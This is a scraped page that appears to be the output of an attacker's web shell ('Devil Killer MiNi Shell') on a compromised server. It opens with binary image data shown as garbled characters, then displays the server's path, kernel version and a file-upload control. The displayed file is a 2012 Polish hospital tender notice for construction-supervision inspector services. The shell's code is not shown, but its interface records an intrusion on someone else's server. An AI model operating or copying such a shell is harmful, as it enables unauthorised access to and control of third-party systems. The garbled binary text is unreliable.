JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120412/116070-N-2012.html

<p class="kh_header"><b>Sosnowiec: USŁUGA PN. PEŁNIENIE OBOWIĄZKÓW INSPEKTORA NADZORU INWESTYCYJNEGO BRANŻY KONSTRUKCYJNO-BUDOWLANEJ, INSTALACYJNEJ, ELEKTRYCZNEJ NA CZAS WYKONYWANIA ROBÓT ZWIĄZANYCH Z REALIZACJĄ ZADAŃ INWESTYCYJNYCH PROWADZONYCH W OBIEKTACH SZPITALA PRZY UL. ZEGADŁOWICZA 3, UL. SZPITALNEJ 1</b><br>
<b>Numer ogłoszenia: 116070 - 2012; data zamieszczenia: 12.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 32 41 30 111, faks 32 41 30 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA PN. PEŁNIENIE OBOWIĄZKÓW INSPEKTORA NADZORU INWESTYCYJNEGO BRANŻY KONSTRUKCYJNO-BUDOWLANEJ, INSTALACYJNEJ, ELEKTRYCZNEJ NA CZAS WYKONYWANIA ROBÓT ZWIĄZANYCH Z REALIZACJĄ ZADAŃ INWESTYCYJNYCH PROWADZONYCH W OBIEKTACH SZPITALA PRZY UL. ZEGADŁOWICZA 3, UL. SZPITALNEJ 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na  pełnieniu obowiązków inspektora nadzoru inwestycyjnego branży konstrukcyjno-budowlanej, instalacyjnej, elektrycznej na czas wykonywania robót związanych z realizacją zadań inwestycyjnych prowadzonych w obiektach szpitala przy ul. Zegadłowicza 3, 
ul. Szpitalnej 1 z podziałem na pakiety.
2.	Opis przedmiotu zamówienia wraz z warunkami stawianymi przez Zamawiającego stanowi załącznik nr 1 do SIWZ oraz załącznik nr 3 do SIWZ - wzór umowy.
3.	Zamówienie składa się z 10 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony, jeżeli Wykonawcy wykażą się zrealizowaniem lub realizowaniem usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców i załączą dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie tj:
pakiet nr A.1. -  nadzorował w obiektach ochrony zdrowia co najmniej 2  roboty budowlane o wartości minimum 80 000 zł  polegające na budowie, przebudowie lub remoncie instalacji gazów medycznych;

Pakiet nr B.1. - nadzorował w obiektach ochrony zdrowia co najmniej 2 roboty budowlane o wartości minimum 1 000 000 zł  polegające na budowie, przebudowie lub remoncie budynków szpitalnych;

Pakiet nr B.2. - nadzorował w obiektach ochrony zdrowia co najmniej 2  roboty budowlane o wartości minimum 700 000 zł  polegające na budowie, przebudowie lub remoncie instalacji wewnętrznych zimnej i ciepłej wody użytkowej, kanalizacji, wentylacji, centralnego ogrzewania i gazów medycznych; 

Pakiet nr B.3. - nadzorował w obiektach ochrony zdrowia co najmniej 2  roboty budowlane o wartości minimum 500 000 zł   polegające na budowie, przebudowie lub remoncie instalacji elektrycznych; 

Pakiet nr C.1. - nadzorował w obiektach ochrony zdrowia co najmniej 2 roboty budowlane o wartości minimum  40 000 zł   polegające na budowie, przebudowie lub remoncie budynków szpitalnych;

Pakiet nr C.2. - nadzorował w obiektach ochrony zdrowia co najmniej 2  roboty budowlane o wartości minimum 1 000 000 zł   polegające na budowie, przebudowie lub remoncie instalacji i sieci elektrycznych oraz  rozdzielni średniego i niskiego napięcia z układem automatycznego przełączania zasilania i agregatem prądotwórczym;

Pakiet nr D.1.- nadzorował w obiektach ochrony zdrowia co najmniej 2  roboty budowlane o wartości minimum 200 000 zł  polegające na budowie, przebudowie lub remoncie budynków szpitalnych;

Pakiet nr D.2. - nadzorował w obiektach ochrony zdrowia co najmniej 2 roboty budowlane o wartości minimum 250 000 zł   polegające na budowie, przebudowie lub remoncie sieci i  instalacji zimnej wody, kanalizacji i urządzeń i instalacji hydroforowych;

Pakiet nr E.1. - nadzorował w obiektach ochrony zdrowia co najmniej 2  roboty budowlane o wartości minimum 50 000   polegające na budowie, przebudowie lub remoncie budynków szpitalnych; 

Pakiet nr E.2. - nadzorował w obiektach ochrony zdrowia co najmniej 2 roboty budowlane o wartości minimum 50 000 zł  polegające na budowie, przebudowie lub remoncie instalacji wentylacji mechanicznej;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  warunek ten zostanie spełniony, jeżeli Wykonawca wykaże dysponowanie osobą posiadającą:
pakiet nr A.1. -  uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej, zgodnie z § 23 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr B.1. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 ustawy Ustawy  z dnia 12 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa ( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr B.2. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 23 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr B.3. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr C.1. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.), 2-letnia praktyka zawodowa na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie z wymaganiami określonymi w § 24 ust. 2  Rozporządzenie Ministra Kultury i Dziedzictwa Narodowego w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych z dnia 27 lipca 2011 r. (Dz.U.  Nr 165, poz. 987) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr C.2. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr D.1.- uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.), 2-letnia praktyka zawodowa na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie z wymaganiami określonymi w § 24 ust. 2 Rozporządzenie Ministra Kultury i Dziedzictwa Narodowego w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych z dnia 27 lipca 2011 r. (Dz.U.  Nr 165, poz. 987) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa ( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr D.2. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr E.1. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej zgodnie z § 17 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa ( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);

Pakiet nr E.2. - uprawnienia do sprawowania samodzielnych funkcji w budownictwie o specjalności instalacyjnej zgodnie z § 24 ust.1 Rozporządzenie Ministra Transportu i Budownictwa w sprawie samodzielnych funkcji technicznych w budownictwie z dnia 28 kwietnia 2006 r. (Dz.U.  Nr 83, poz. 578 z późn. zmian.) oraz  zaświadczenie  o przynależności do właściwej okręgowej izby samorządu zawodowego zgodnie z art. 6 ust. 2,3 Ustawy  z dnia 12 grudnia 2000r.  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) oraz Rozporządzenie Ministra Finansów  z dnia 11 grudnia 2003r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów  oraz inżynierów  budownictwa 
( Dz. U. 2003,Nr 220, poz. 2174 z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-  formularz oświadczeń, wg wzoru stanowiącego załącznik nr 2  do SIWZ,
-  formularz oferty - cenowy, wg wzoru stanowiącego załącznik nr 4 do SIWZ,
-  wykaz usług, wg wzoru stanowiącego załącznik nr 5 do SIWZ,
-  wykaz osób, wg wzoru stanowiącego załącznik nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin zakończenia o którym mowa w § 8  umowy może ulec przedłużeniu lub skróceniu jeżeli wykonawca robót zakończy je wcześniej lub wydłuży cykl realizacji  a powyższy fakt będzie miał odzwierciedlenie w umowie  zawartej  pomiędzy Zamawiającym a     wykonawcą robót. Wydłużenie terminu zakończenia realizacji usługi będzie wprowadzone aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl zakładka zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Dziale Zamówień Publicznych i Zawierania Umów Szpitala Miejskiego, 41-219 Sosnowiec, ul. Szpitalna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 11:00, miejsce: w Samodzielnym Publicznym Szpitalu Miejskim w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1, Sekretariat III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET A.1.
PEŁNIENIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO W BRANŻY INSTALACYJNEJ.</p>
